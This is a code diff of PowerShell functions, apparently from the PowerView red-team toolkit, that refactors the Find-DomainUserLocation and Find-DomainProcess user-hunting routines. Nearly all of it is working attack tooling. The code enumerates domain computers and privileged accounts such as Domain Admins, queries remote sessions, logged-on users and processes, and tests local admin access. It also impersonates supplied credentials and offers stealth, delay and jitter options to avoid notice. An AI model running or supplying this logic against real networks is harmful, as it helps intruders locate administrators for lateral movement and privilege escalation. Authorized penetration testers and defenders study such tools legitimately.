+        if ($PSBoundParameters['UserLDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $UserLDAPFilter }
+        if ($PSBoundParameters['UserSearchBase']) { $UserSearcherArguments['SearchBase'] = $UserSearchBase }
+        if ($PSBoundParameters['UserAdminCount']) { $UserSearcherArguments['AdminCount'] = $UserAdminCount }
+        if ($PSBoundParameters['UserAllowDelegation']) { $UserSearcherArguments['AllowDelegation'] = $UserAllowDelegation }
+        if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential }
+
+        $TargetComputers = @()
+
+        # first, build the set of computers to enumerate
+        if ($PSBoundParameters['ComputerName']) {
+            $TargetComputers = @($ComputerName)
         }
-
-        if(!$ComputerName) { 
-            [Array]$ComputerName = @()
-
-            if($Domain) {
-                $TargetDomains = @($Domain)
-            }
-            elseif($SearchForest) {
-                # get ALL the domains in the forest to search
-                $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name }
-            }
-            else {
-                # use the local domain
-                $TargetDomains = @( (Get-NetDomain).name )
-            }
-            
-            if($Stealth) {
-                Write-Verbose "Stealth mode! Enumerating commonly used servers"
-                Write-Verbose "Stealth source: $StealthSource"
-
-                ForEach ($Domain in $TargetDomains) {
-                    if (($StealthSource -eq "File") -or ($StealthSource -eq "All")) {
-                        Write-Verbose "[*] Querying domain $Domain for File Servers..."
-                        $ComputerName += Get-NetFileServer -Domain $Domain -DomainController $DomainController
-                    }
-                    if (($StealthSource -eq "DFS") -or ($StealthSource -eq "All")) {
-                        Write-Verbose "[*] Querying domain $Domain for DFS Servers..."
-                        $ComputerName += Get-DFSshare -Domain $Domain -DomainController $DomainController | ForEach-Object {$_.RemoteServerName}
-                    }
-                    if (($StealthSource -eq "DC") -or ($StealthSource -eq "All")) {
-                        Write-Verbose "[*] Querying domain $Domain for Domain Controllers..."
-                        $ComputerName += Get-NetDomainController -LDAP -Domain $Domain -DomainController $DomainController | ForEach-Object { $_.dnshostname}
-                    }
+        else {
+            if ($PSBoundParameters['Stealth']) {
+                Write-Verbose "[Find-DomainUserLocation] Stealth enumeration using source: $StealthSource"
+                $TargetComputerArrayList = New-Object System.Collections.ArrayList
+
+                if ($StealthSource -match 'File|All') {
+                    Write-Verbose '[Find-DomainUserLocation] Querying for file servers'
+                    $FileServerSearcherArguments = @{}
+                    if ($PSBoundParameters['Domain']) { $FileServerSearcherArguments['Domain'] = $Domain }
+                    if ($PSBoundParameters['ComputerDomain']) { $FileServerSearcherArguments['Domain'] = $ComputerDomain }
+                    if ($PSBoundParameters['ComputerSearchBase']) { $FileServerSearcherArguments['SearchBase'] = $ComputerSearchBase }
+                    if ($PSBoundParameters['Server']) { $FileServerSearcherArguments['Server'] = $Server }
+                    if ($PSBoundParameters['SearchScope']) { $FileServerSearcherArguments['SearchScope'] = $SearchScope }
+                    if ($PSBoundParameters['ResultPageSize']) { $FileServerSearcherArguments['ResultPageSize'] = $ResultPageSize }
+                    if ($PSBoundParameters['ServerTimeLimit']) { $FileServerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+                    if ($PSBoundParameters['Tombstone']) { $FileServerSearcherArguments['Tombstone'] = $Tombstone }
+                    if ($PSBoundParameters['Credential']) { $FileServerSearcherArguments['Credential'] = $Credential }
+                    $FileServers = Get-DomainFileServer @FileServerSearcherArguments
+                    if ($FileServers -isnot [System.Array]) { $FileServers = @($FileServers) }
+                    $TargetComputerArrayList.AddRange( $FileServers )
                 }
-            }
-            else {
-                ForEach ($Domain in $TargetDomains) {
-                    Write-Verbose "[*] Querying domain $Domain for hosts"
-
-                    $Arguments = @{
-                        'Domain' = $Domain
-                        'DomainController' = $DomainController
-                        'ADSpath' = $ADSpath
-                        'Filter' = $ComputerFilter
-                        'Unconstrained' = $Unconstrained
+                if ($StealthSource -match 'DFS|All') {
+                    Write-Verbose '[Find-DomainUserLocation] Querying for DFS servers'
+                    # # TODO: fix the passed parameters to Get-DomainDFSShare
+                    # $ComputerName += Get-DomainDFSShare -Domain $Domain -Server $DomainController | ForEach-Object {$_.RemoteServerName}
+                }
+                if ($StealthSource -match 'DC|All') {
+                    Write-Verbose '[Find-DomainUserLocation] Querying for domain controllers'
+                    $DCSearcherArguments = @{
+                        'LDAP' = $True
                     }
-
-                    $ComputerName += Get-NetComputer @Arguments
+                    if ($PSBoundParameters['Domain']) { $DCSearcherArguments['Domain'] = $Domain }
+                    if ($PSBoundParameters['ComputerDomain']) { $DCSearcherArguments['Domain'] = $ComputerDomain }
+                    if ($PSBoundParameters['Server']) { $DCSearcherArguments['Server'] = $Server }
+                    if ($PSBoundParameters['Credential']) { $DCSearcherArguments['Credential'] = $Credential }
+                    $DomainControllers = Get-DomainController @DCSearcherArguments | Select-Object -ExpandProperty dnshostname
+                    if ($DomainControllers -isnot [System.Array]) { $DomainControllers = @($DomainControllers) }
+                    $TargetComputerArrayList.AddRange( $DomainControllers )
                 }
+                $TargetComputers = $TargetComputerArrayList.ToArray()
             }
-
-            # remove any null target hosts, uniquify the list and shuffle it
-            $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random }
-            if($($ComputerName.Count) -eq 0) {
-                throw "No hosts found!"
+            else {
+                Write-Verbose '[Find-DomainUserLocation] Querying for all computers in the domain'
+                $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname
             }
         }
-
-        if ($Poll -gt 0) {
-            Write-Verbose "[*] Polling for $Poll seconds. Automatically enabling threaded mode."
-            if ($ComputerName.Count -gt 100) {
-                throw "Too many hosts to poll! Try fewer than 100."
-            }
-            $Threads = $ComputerName.Count
+        Write-Verbose "[Find-DomainUserLocation] TargetComputers length: $($TargetComputers.Length)"
+        if ($TargetComputers.Length -eq 0) {
+            throw '[Find-DomainUserLocation] No hosts found to enumerate'
         }
 
-        #####################################################
-        #
-        # Now we build the user target set
-        #
-        #####################################################
-
-        # users we're going to be searching for
-        $TargetUsers = @()
-
         # get the current user so we can ignore it in the results
-        $CurrentUser = ([Environment]::UserName).toLower()
-
-        # if we're showing all results, skip username enumeration
-        if($ShowAll -or $ForeignUsers) {
-            $User = New-Object PSObject
-            $User | Add-Member Noteproperty 'MemberDomain' $Null
-            $User | Add-Member Noteproperty 'MemberName' '*'
-            $TargetUsers = @($User)
-
-            if($ForeignUsers) {
-                # if we're searching for user results not in the primary domain
-                $krbtgtName = Convert-ADName -ObjectName "krbtgt@$($Domain)" -InputType Simple -OutputType NT4
-                $DomainShortName = $krbtgtName.split("\")[0]
-            }
-        }
-        # if we want to hunt for the effective domain users who can access a target server
-        elseif($TargetServer) {
-            Write-Verbose "Querying target server '$TargetServer' for local users"
-            $TargetUsers = Get-NetLocalGroup $TargetServer -Recurse | Where-Object {(-not $_.IsGroup) -and $_.IsDomain } | ForEach-Object {
-                $User = New-Object PSObject
-                $User | Add-Member Noteproperty 'MemberDomain' ($_.AccountName).split("/")[0].toLower() 
-                $User | Add-Member Noteproperty 'MemberName' ($_.AccountName).split("/")[1].toLower() 
-                $User
-            }  | Where-Object {$_}
+        if ($PSBoundParameters['Credential']) {
+            $CurrentUser = $Credential.GetNetworkCredential().UserName
         }
-        # if we get a specific username, only use that
-        elseif($UserName) {
-            Write-Verbose "[*] Using target user '$UserName'..."
-            $User = New-Object PSObject
-            if($TargetDomains) {
-                $User | Add-Member Noteproperty 'MemberDomain' $TargetDomains[0]
-            }
-            else {
-                $User | Add-Member Noteproperty 'MemberDomain' $Null
-            }
-            $User | Add-Member Noteproperty 'MemberName' $UserName.ToLower()
-            $TargetUsers = @($User)
-        }
-        # read in a target user list if we have one
-        elseif($UserFile) {
-            $TargetUsers = Get-Content -Path $UserFile | ForEach-Object {
-                $User = New-Object PSObject
-                if($TargetDomains) {
-                    $User | Add-Member Noteproperty 'MemberDomain' $TargetDomains[0]
-                }
-                else {
-                    $User | Add-Member Noteproperty 'MemberDomain' $Null
-                }
-                $User | Add-Member Noteproperty 'MemberName' $_
-                $User
-            }  | Where-Object {$_}
+        else {
+            $CurrentUser = ([Environment]::UserName).ToLower()
         }
-        elseif($UserADSpath -or $UserFilter -or $AdminCount) {
-            ForEach ($Domain in $TargetDomains) {
-
-                $Arguments = @{
-                    'Domain' = $Domain
-                    'DomainController' = $DomainController
-                    'ADSpath' = $UserADSpath
-                    'Filter' = $UserFilter
-                    'AdminCount' = $AdminCount
-                    'AllowDelegation' = $AllowDelegation
-                }
-
-                Write-Verbose "[*] Querying domain $Domain for users"
-                $TargetUsers += Get-NetUser @Arguments | ForEach-Object {
-                    $User = New-Object PSObject
-                    $User | Add-Member Noteproperty 'MemberDomain' $Domain
-                    $User | Add-Member Noteproperty 'MemberName' $_.samaccountname
-                    $User
-                }  | Where-Object {$_}
 
-            }
+        # now build the user target set
+        if ($PSBoundParameters['ShowAll']) {
+            $TargetUsers = @()
+        }
+        elseif ($PSBoundParameters['UserIdentity'] -or $PSBoundParameters['UserLDAPFilter'] -or $PSBoundParameters['UserSearchBase'] -or $PSBoundParameters['UserAdminCount'] -or $PSBoundParameters['UserAllowDelegation']) {
+            $TargetUsers = Get-DomainUser @UserSearcherArguments | Select-Object -ExpandProperty samaccountname
         }
         else {
-            ForEach ($Domain in $TargetDomains) {
-                Write-Verbose "[*] Querying domain $Domain for users of group '$GroupName'"
-                $TargetUsers += Get-NetGroupMember -GroupName $GroupName -Domain $Domain -DomainController $DomainController
+            $GroupSearcherArguments = @{
+                'Identity' = $UserGroupIdentity
+                'Recurse' = $True
             }
+            if ($PSBoundParameters['UserDomain']) { $GroupSearcherArguments['Domain'] = $UserDomain }
+            if ($PSBoundParameters['UserSearchBase']) { $GroupSearcherArguments['SearchBase'] = $UserSearchBase }
+            if ($PSBoundParameters['Server']) { $GroupSearcherArguments['Server'] = $Server }
+            if ($PSBoundParameters['SearchScope']) { $GroupSearcherArguments['SearchScope'] = $SearchScope }
+            if ($PSBoundParameters['ResultPageSize']) { $GroupSearcherArguments['ResultPageSize'] = $ResultPageSize }
+            if ($PSBoundParameters['ServerTimeLimit']) { $GroupSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+            if ($PSBoundParameters['Tombstone']) { $GroupSearcherArguments['Tombstone'] = $Tombstone }
+            if ($PSBoundParameters['Credential']) { $GroupSearcherArguments['Credential'] = $Credential }
+            $TargetUsers = Get-DomainGroupMember @GroupSearcherArguments | Select-Object -ExpandProperty MemberName
         }
 
-        if (( (-not $ShowAll) -and (-not $ForeignUsers) ) -and ((!$TargetUsers) -or ($TargetUsers.Count -eq 0))) {
-            throw "[!] No users found to search for!"
+        Write-Verbose "[Find-DomainUserLocation] TargetUsers length: $($TargetUsers.Length)"
+        if ((-not $ShowAll) -and ($TargetUsers.Length -eq 0)) {
+            throw '[Find-DomainUserLocation] No users found to target'
         }
 
-        # script block that enumerates a server
+        # the host enumeration block we're using to enumerate all servers
         $HostEnumBlock = {
-            param($ComputerName, $Ping, $TargetUsers, $CurrentUser, $Stealth, $DomainShortName, $Poll, $Delay, $Jitter)
-
-            # optionally check if the server is up first
-            $Up = $True
-            if($Ping) {
-                $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName
-            }
-            if($Up) {
-                $Timer = [System.Diagnostics.Stopwatch]::StartNew()
-                $RandNo = New-Object System.Random
-
-                Do {
-                    if(!$DomainShortName) {
-                        # if we're not searching for foreign users, check session information
-                        $Sessions = Get-NetSession -ComputerName $ComputerName
-                        ForEach ($Session in $Sessions) {
-                            $UserName = $Session.sesi10_username
-                            $CName = $Session.sesi10_cname
-
-                            if($CName -and $CName.StartsWith("\\")) {
-                                $CName = $CName.TrimStart("\")
-                            }
+            Param($ComputerName, $TargetUsers, $CurrentUser, $Stealth, $TokenHandle)
+
+            if ($TokenHandle) {
+                # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation
+                $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet
+            }
 
-                            # make sure we have a result
-                            if (($UserName) -and ($UserName.trim() -ne '') -and (!($UserName -match $CurrentUser))) {
+            ForEach ($TargetComputer in $ComputerName) {
+                $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer
+                if ($Up) {
+                    $Sessions = Get-NetSession -ComputerName $TargetComputer
+                    ForEach ($Session in $Sessions) {
+                        $UserName = $Session.UserName
+                        $CName = $Session.CName
 
-                                $TargetUsers | Where-Object {$UserName -like $_.MemberName} | ForEach-Object {
+                        if ($CName -and $CName.StartsWith('\\')) {
+                            $CName = $CName.TrimStart('\')
+                        }
 
-                                    $IPAddress = @(Get-IPAddress -ComputerName $ComputerName)[0].IPAddress
-                                    $FoundUser = New-Object PSObject
-                                    $FoundUser | Add-Member Noteproperty 'UserDomain' $_.MemberDomain
-                                    $FoundUser | Add-Member Noteproperty 'UserName' $UserName
-                                    $FoundUser | Add-Member Noteproperty 'ComputerName' $ComputerName
-                                    $FoundUser | Add-Member Noteproperty 'IPAddress' $IPAddress
-                                    $FoundUser | Add-Member Noteproperty 'SessionFrom' $CName
+                        # make sure we have a result, and ignore computer$ sessions
+                        if (($UserName) -and ($UserName.Trim() -ne '') -and ($UserName -notmatch $CurrentUser) -and ($UserName -notmatch '\$$')) {
 
-                                    # Try to resolve the DNS hostname of $Cname
-                                    try {
-                                        $CNameDNSName = [System.Net.Dns]::GetHostEntry($CName) | Select-Object -ExpandProperty HostName
-                                        $FoundUser | Add-Member NoteProperty 'SessionFromName' $CnameDNSName
-                                    }
-                                    catch {
-                                        $FoundUser | Add-Member NoteProperty 'SessionFromName' $Null
-                                    }
+                            if ( (-not $TargetUsers) -or ($TargetUsers -contains $UserName)) {
+                                $UserLocation = New-Object PSObject
+                                $UserLocation | Add-Member Noteproperty 'UserDomain' $Null
+                                $UserLocation | Add-Member Noteproperty 'UserName' $UserName
+                                $UserLocation | Add-Member Noteproperty 'ComputerName' $TargetComputer
+                                $UserLocation | Add-Member Noteproperty 'SessionFrom' $CName
 
-                                    # see if we're checking to see if we have local admin access on this machine
-                                    if ($CheckAccess) {
-                                        $Admin = Invoke-CheckLocalAdminAccess -ComputerName $CName
-                                        $FoundUser | Add-Member Noteproperty 'LocalAdmin' $Admin.IsAdmin
-                                    }
-                                    else {
-                                        $FoundUser | Add-Member Noteproperty 'LocalAdmin' $Null
-                                    }
-                                    $FoundUser.PSObject.TypeNames.Add('PowerView.UserSession')
-                                    $FoundUser
+                                # try to resolve the DNS hostname of $Cname
+                                try {
+                                    $CNameDNSName = [System.Net.Dns]::GetHostEntry($CName) | Select-Object -ExpandProperty HostName
+                                    $UserLocation | Add-Member NoteProperty 'SessionFromName' $CnameDNSName
+                                }
+                                catch {
+                                    $UserLocation | Add-Member NoteProperty 'SessionFromName' $Null
+                                }
+
+                                # see if we're checking to see if we have local admin access on this machine
+                                if ($CheckAccess) {
+                                    $Admin = (Test-AdminAccess -ComputerName $CName).IsAdmin
+                                    $UserLocation | Add-Member Noteproperty 'LocalAdmin' $Admin.IsAdmin
                                 }
+                                else {
+                                    $UserLocation | Add-Member Noteproperty 'LocalAdmin' $Null
+                                }
+                                $UserLocation.PSObject.TypeNames.Insert(0, 'PowerView.UserLocation')
+                                $UserLocation
                             }
                         }
                     }
-                    if(!$Stealth) {
+                    if (-not $Stealth) {
                         # if we're not 'stealthy', enumerate loggedon users as well
-                        $LoggedOn = Get-NetLoggedon -ComputerName $ComputerName
+                        $LoggedOn = Get-NetLoggedon -ComputerName $TargetComputer
                         ForEach ($User in $LoggedOn) {
-                            $UserName = $User.wkui1_username
-                            # TODO: translate domain to authoratative name
-                            #   then match domain name ?
-                            $UserDomain = $User.wkui1_logon_domain
+                            $UserName = $User.UserName
+                            $UserDomain = $User.LogonDomain
 
                             # make sure wet have a result
                             if (($UserName) -and ($UserName.trim() -ne '')) {
+                                if ( (-not $TargetUsers) -or ($TargetUsers -contains $UserName) -and ($UserName -notmatch '\$$')) {
+                                    $IPAddress = @(Resolve-IPAddress -ComputerName $TargetComputer)[0].IPAddress
+                                    $UserLocation = New-Object PSObject
+                                    $UserLocation | Add-Member Noteproperty 'UserDomain' $UserDomain
+                                    $UserLocation | Add-Member Noteproperty 'UserName' $UserName
+                                    $UserLocation | Add-Member Noteproperty 'ComputerName' $TargetComputer
+                                    $UserLocation | Add-Member Noteproperty 'IPAddress' $IPAddress
+                                    $UserLocation | Add-Member Noteproperty 'SessionFrom' $Null
+                                    $UserLocation | Add-Member Noteproperty 'SessionFromName' $Null
 
-                                $TargetUsers | Where-Object {$UserName -like $_.MemberName} | ForEach-Object {
-
-                                    $Proceed = $True
-                                    if($DomainShortName) {
-                                        if ($DomainShortName.ToLower() -ne $UserDomain.ToLower()) {
-                                            $Proceed = $True
-                                        }
-                                        else {
-                                            $Proceed = $False
-                                        }
+                                    # see if we're checking to see if we have local admin access on this machine
+                                    if ($CheckAccess) {
+                                        $Admin = Test-AdminAccess -ComputerName $TargetComputer
+                                        $UserLocation | Add-Member Noteproperty 'LocalAdmin' $Admin.IsAdmin
                                     }
-                                    if($Proceed) {
-                                        $IPAddress = @(Get-IPAddress -ComputerName $ComputerName)[0].IPAddress
-                                        $FoundUser = New-Object PSObject
-                                        $FoundUser | Add-Member Noteproperty 'UserDomain' $UserDomain
-                                        $FoundUser | Add-Member Noteproperty 'UserName' $UserName
-                                        $FoundUser | Add-Member Noteproperty 'ComputerName' $ComputerName
-                                        $FoundUser | Add-Member Noteproperty 'IPAddress' $IPAddress
-                                        $FoundUser | Add-Member Noteproperty 'SessionFrom' $Null
-                                        $FoundUser | Add-Member Noteproperty 'SessionFromName' $Null
-
-                                        # see if we're checking to see if we have local admin access on this machine
-                                        if ($CheckAccess) {
-                                            $Admin = Invoke-CheckLocalAdminAccess -ComputerName $ComputerName
-                                            $FoundUser | Add-Member Noteproperty 'LocalAdmin' $Admin.IsAdmin
-                                        }
-                                        else {
-                                            $FoundUser | Add-Member Noteproperty 'LocalAdmin' $Null
-                                        }
-                                        $FoundUser.PSObject.TypeNames.Add('PowerView.UserSession')
-                                        $FoundUser
+                                    else {
+                                        $UserLocation | Add-Member Noteproperty 'LocalAdmin' $Null
                                     }
+                                    $UserLocation.PSObject.TypeNames.Insert(0, 'PowerView.UserLocation')
+                                    $UserLocation
                                 }
                             }
                         }
                     }
+                }
+            }
 
-                    if ($Poll -gt 0) {
-                        Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
-                    }
-                } While ($Poll -gt 0 -and $Timer.Elapsed.TotalSeconds -lt $Poll)
+            if ($TokenHandle) {
+                Invoke-RevertToSelf
             }
         }
-    }
-
-    process {
-
-        if($Threads) {
-            Write-Verbose "Using threading with threads = $Threads"
 
-            # if we're using threading, kick off the script block with Invoke-ThreadedFunction
-            $ScriptParams = @{
-                'Ping' = $(-not $NoPing)
-                'TargetUsers' = $TargetUsers
-                'CurrentUser' = $CurrentUser
-                'Stealth' = $Stealth
-                'DomainShortName' = $DomainShortName
-                'Poll' = $Poll
-                'Delay' = $Delay
-                'Jitter' = $Jitter
+        $LogonToken = $Null
+        if ($PSBoundParameters['Credential']) {
+            if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
+                $LogonToken = Invoke-UserImpersonation -Credential $Credential
+            }
+            else {
+                $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet
             }
-
-            # kick off the threaded script block + arguments 
-            Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
         }
+    }
 
-        else {
-            if(-not $NoPing -and ($ComputerName.count -ne 1)) {
-                # ping all hosts in parallel
-                $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}}
-                $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100
-            }
+    PROCESS {
+        # only ignore threading if -Delay is passed
+        if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
 
-            Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)"
+            Write-Verbose "[Find-DomainUserLocation] Total number of hosts: $($TargetComputers.count)"
+            Write-Verbose "[Find-DomainUserLocation] Delay: $Delay, Jitter: $Jitter"
             $Counter = 0
             $RandNo = New-Object System.Random
 
-            ForEach ($Computer in $ComputerName) {
-
+            ForEach ($TargetComputer in $TargetComputers) {
                 $Counter = $Counter + 1
 
                 # sleep for our semi-randomized interval
                 Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
 
-                Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))"
-                $Result = Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $Computer, $False, $TargetUsers, $CurrentUser, $Stealth, $DomainShortName, 0, 0, 0
-                $Result
+                Write-Verbose "[Find-DomainUserLocation] Enumerating server $Computer ($Counter of $($TargetComputers.Count))"
+                Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $TargetUsers, $CurrentUser, $Stealth, $LogonToken
 
-                if($Result -and $StopOnSuccess) {
-                    Write-Verbose "[*] Target user found, returning early"
+                if ($Result -and $StopOnSuccess) {
+                    Write-Verbose "[Find-DomainUserLocation] Target user found, returning early"
                     return
                 }
             }
         }
+        else {
+            Write-Verbose "[Find-DomainUserLocation] Using threading with threads: $Threads"
+            Write-Verbose "[Find-DomainUserLocation] TargetComputers length: $($TargetComputers.Length)"
 
-    }
-}
-
+            # if we're using threading, kick off the script block with New-ThreadedFunction
+            $ScriptParams = @{
+                'TargetUsers' = $TargetUsers
+                'CurrentUser' = $CurrentUser
+                'Stealth' = $Stealth
+                'TokenHandle' = $LogonToken
+            }
 
-function Invoke-StealthUserHunter {
-    [CmdletBinding()]
-    param(
-        [Parameter(Position=0,ValueFromPipeline=$True)]
-        [Alias('Hosts')]
-        [String[]]
-        $ComputerName,
+            # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params
+            New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
+        }
+    }
 
-        [ValidateScript({Test-Path -Path $_ })]
-        [Alias('HostList')]
-        [String]
-        $ComputerFile,
+    END {
+        if ($LogonToken) {
+            Invoke-RevertToSelf -TokenHandle $LogonToken
+        }
+    }
+}
 
-        [String]
-        $ComputerFilter,
 
-        [String]
-        $ComputerADSpath,
+function Find-DomainProcess {
+<#
+.SYNOPSIS
 
-        [String]
-        $GroupName = 'Domain Admins',
+Searches for processes on the domain using WMI, returning processes
+that match a particular user specification or process name.
 
-        [String]
-        $TargetServer,
+Thanks to @paulbrandau for the approach idea.
 
-        [String]
-        $UserName,
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Get-WMIProcess, New-ThreadedFunction  
 
-        [String]
-        $UserFilter,
+.DESCRIPTION
 
-        [String]
-        $UserADSpath,
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and queries the domain for users of a specified group
+(default 'Domain Admins') with Get-DomainGroupMember. Then for each server the
+function enumerates any current processes running with Get-WMIProcess,
+searching for processes running under any target user contexts or with the
+specified -ProcessName. If -Credential is passed, it is passed through to
+the underlying WMI commands used to enumerate the remote machines.
 
-        [ValidateScript({Test-Path -Path $_ })]
-        [String]
-        $UserFile,
+.PARAMETER ComputerName
 
-        [Switch]
-        $CheckAccess,
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
 
-        [Switch]
-        $StopOnSuccess,
+.PARAMETER Domain
 
-        [Switch]
-        $NoPing,
+Specifies the domain to query for computers AND users, defaults to the current domain.
 
-        [UInt32]
-        $Delay = 0,
+.PARAMETER ComputerDomain
 
-        [Double]
-        $Jitter = .3,
+Specifies the domain to query for computers, defaults to the current domain.
 
-        [String]
-        $Domain,
+.PARAMETER ComputerLDAPFilter
 
-        [Switch]
-        $ShowAll,
+Specifies an LDAP query string that is used to search for computer objects.
 
-        [Switch]
-        $SearchForest,
+.PARAMETER ComputerSearchBase
 
-        [String]
-        [ValidateSet("DFS","DC","File","All")]
-        $StealthSource ="All"
-    )
-    # kick off Invoke-UserHunter with stealth options
-    Invoke-UserHunter -Stealth @PSBoundParameters
-}
+Specifies the LDAP source to search through for computers,
+e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
 
+.PARAMETER ComputerUnconstrained
 
-function Invoke-ProcessHunter {
-<#
-    .SYNOPSIS
+Switch. Search computer objects that have unconstrained delegation.
 
-        Query the process lists of remote machines, searching for
-        processes with a specific name or owned by a specific user.
-        Thanks to @paulbrandau for the approach idea.
-        
-        Author: @harmj0y
-        License: BSD 3-Clause
+.PARAMETER ComputerOperatingSystem
 
-    .PARAMETER ComputerName
+Search computers with a specific operating system, wildcards accepted.
 
-        Host array to enumerate, passable on the pipeline.
+.PARAMETER ComputerServicePack
 
-    .PARAMETER ComputerFile
+Search computers with a specific service pack, wildcards accepted.
 
-        File of hostnames/IPs to search.
+.PARAMETER ComputerSiteName
 
-    .PARAMETER ComputerFilter
+Search computers in the specific AD Site name, wildcards accepted.
 
-        Host filter name to query AD for, wildcards accepted.
+.PARAMETER ProcessName
 
-    .PARAMETER ComputerADSpath
+Search for processes with one or more specific names.
 
-        The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
-        Useful for OU queries.
+.PARAMETER UserIdentity
 
-    .PARAMETER ProcessName
+Specifies one or more user identities to search for.
 
-        The name of the process to hunt, or a comma separated list of names.
+.PARAMETER UserDomain
 
-    .PARAMETER GroupName
+Specifies the domain to query for users to search for, defaults to the current domain.
 
-        Group name to query for target users.
+.PARAMETER UserLDAPFilter
 
-    .PARAMETER TargetServer
+Specifies an LDAP query string that is used to search for target users.
 
-        Hunt for users who are effective local admins on a target server.
+.PARAMETER UserSearchBase
 
-    .PARAMETER UserName
+Specifies the LDAP source to search through for target users.
+e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
 
-        Specific username to search for.
+.PARAMETER UserGroupIdentity
 
-    .PARAMETER UserFilter
+Specifies a group identity to query for target users, defaults to 'Domain Admins.
+If any other user specifications are set, then UserGroupIdentity is ignored.
 
-        A customized ldap filter string to use for user enumeration, e.g. "(description=*admin*)"
+.PARAMETER UserAdminCount
 
-    .PARAMETER UserADSpath
+Switch. Search for users users with '(adminCount=1)' (meaning are/were privileged).
 
-        The LDAP source to search through for users, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
-        Useful for OU queries.
+.PARAMETER Server
 
-    .PARAMETER UserFile
+Specifies an Active Directory server (domain controller) to bind to.
 
-        File of usernames to search for.
+.PARAMETER SearchScope
 
-    .PARAMETER StopOnSuccess
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
 
-        Switch. Stop hunting after finding after finding a target user/process.
+.PARAMETER ResultPageSize
 
-    .PARAMETER NoPing
+Specifies the PageSize to set for the LDAP searcher object.
 
-        Switch. Don't ping each host to ensure it's up before enumerating.
+.PARAMETER ServerTimeLimit
 
-    .PARAMETER Delay
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-        Delay between enumerating hosts, defaults to 0
+.PARAMETER Tombstone
 
-    .PARAMETER Jitter
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
 
-        Jitter for the host delay, defaults to +/- 0.3
+.PARAMETER Credential
 
-    .PARAMETER Domain
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain and target systems.
 
-        Domain for query for machines, defaults to the current domain.
+.PARAMETER StopOnSuccess
 
-    .PARAMETER DomainController
+Switch. Stop hunting after finding after finding a target user.
 
-        Domain controller to reflect LDAP queries through.
+.PARAMETER Delay
 
-    .PARAMETER ShowAll
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
 
-        Switch. Return all user location results.
+.PARAMETER Jitter
 
-    .PARAMETER SearchForest
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
 
-        Switch. Search all domains in the forest for target users instead of just
-        a single domain.
+.PARAMETER Threads
 
-    .PARAMETER Threads
+The number of threads to use for user searching, defaults to 20.
 
-        The maximum concurrent threads to execute.
+.EXAMPLE
 
-    .PARAMETER Credential
+Find-DomainProcess
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target machine/domain.
+Searches for processes run by 'Domain Admins' by enumerating every computer in the domain.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Invoke-ProcessHunter -Domain 'testing'
-        
-        Finds machines on the 'testing' domain where domain admins have a
-        running process.
+Find-DomainProcess -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local
 
-    .EXAMPLE
+Enumerates Windows 7 computers in dev.testlab.local and returns any processes being run by
+privileged users in dev.testlab.local.
 
-        PS C:\> Invoke-ProcessHunter -Threads 20
+.EXAMPLE
 
-        Multi-threaded process hunting, replaces Invoke-ProcessHunterThreaded.
+Find-DomainProcess -ProcessName putty.exe
 
-    .EXAMPLE
